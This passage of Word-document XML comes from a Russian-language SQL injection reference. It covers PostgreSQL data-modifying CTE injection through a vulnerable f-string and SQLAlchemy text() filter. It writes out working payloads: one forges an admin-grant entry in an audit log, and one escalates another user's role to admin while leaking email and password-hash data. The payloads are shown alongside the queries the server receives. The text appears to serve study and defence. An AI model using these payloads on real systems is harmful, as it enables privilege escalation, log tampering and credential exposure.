        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"SELECT id, customer_name, total FROM orders_visible WHERE {where_clause}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EAF5AA"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18DF714C"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4F0A31B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orders_visible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view с ACL-фильтром (используется в 3.10.3). В 3.10.1 атакующий пишет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через CTE. В 3.10.2 атакующий запускает recursive CTE для time-based oracle. В 3.10.3 — leaky-предикат в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>where_clause</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55225A20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительный паттерн уязвимости — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>query-builder с ORM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, где user_input идёт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query.where(text(user_input))</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E86840" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stmt = select(Order).where(text(where_clause))  # text() — escape hatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF424EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLAlchemy не параметризует, конкатенирует как литерал. То же, что f-string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1039BBD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Стандартная структура подразделов 3.10.1–3.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7166C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">По </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conventions.md</w:t>
      </w:r>
      <w:r>
        <w:t>: Суть → Уязвимый код (ссылка на 3.10.0) → Payload + Что доходит → Что произойдёт → Почему работает → Требования → Легитимное использование → Версии → Связанные → Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6953EA60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5353471B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: WITH Queries (Common Table Expressions)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основная спецификация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDBB5AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Data-Modifying Statements in WITH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — DML в CTE, RETURNING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D53950" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Rules and Privileges — Updatable views, security_barrier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основа для 3.10.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360483E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст CTE injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66445C6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.10.1 Data-modifying CTE (R22)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679AADF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.10.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340FE96B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617A72CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS (INSERT|UPDATE|DELETE ... RETURNING ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — синтаксически </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>одна</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL-команда, которая выполняет write и одновременно возвращает результат. Атакующий, инъектирующий в SELECT-эндпоинт, использует CTE-обёртку для </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>подавления факта «эндпоинт пишет в БД» — на парсер-уровне ничего необычного, на wire-protocol-уровне это обычный single-statement Parse/Bind/Execute, проходит через extended-protocol без stacked-queries-блока (см. 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319326DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL поддерживает DML в CTE с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (но не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TRUNCATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — не модификация-как-команда). Один CTE может содержать несколько модификаций; каждая видит снапшот данных на старте оператора (не результаты других DML-CTE в той же команде).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75471146" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — INSERT в audit/log-таблицу через UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426EA995" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: SELECT-эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/orders/filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уязвим к UNION-инъекции (см. 3.1). Application-роль имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (запись о действиях самого приложения) — но эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/orders/filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> логически только читает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6C9C69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>where_clause</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B93579" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IS NOT NULL UNION SELECT 1, 'pwn', 0 FROM (WITH ins AS (INSERT INTO audit_log(user_id, action) VALUES (1, 'role_granted_admin') RETURNING id) SELECT 1 FROM ins) sub--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134527D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1553FE"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 WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504413A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 1, 'pwn', 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB312CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E575EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH ins AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9E00F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSERT INTO audit_log(user_id, action)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56458CEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    VALUES (1, 'role_granted_admin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453BFBBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURNING id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935A934" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8E911" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT 1 FROM ins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01D4FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) sub--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A54E75F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внешний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer_name, total ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает легитимный список заказов. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 1, 'pwn', 0 FROM ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавляет одну искусственную строку. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subquery в UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оборачивает CTE с INSERT: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> получает строку с фейковым </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>action='role_granted_admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выглядит как audit-trail-запись, на самом деле — атакующий пишет в журнал, что роль admin была выдана (для подделки следов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463CEBD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — UPDATE для эскалации привилегий через RETURNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30B07C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: тот же эндпоинт. Application-роль имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для смены пароля через legitimate password-reset flow). 3.10.1 использует это, чтобы изменить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чужой строки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF57EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010CA82B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id = 1 UNION SELECT id, name, total FROM (WITH upd AS (UPDATE users SET role='admin' WHERE id=2 RETURNING id, email, password_hash) SELECT id AS id, email AS name, length(password_hash)::numeric AS total FROM upd) sub--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C2C45" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5B4B2D"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 WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FE92C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT id, name, total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280FF12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C63753" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH upd AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14452034" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    UPDATE users SET role='admin' WHERE id=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF13572" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURNING id, email, password_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529C25FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A3101" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
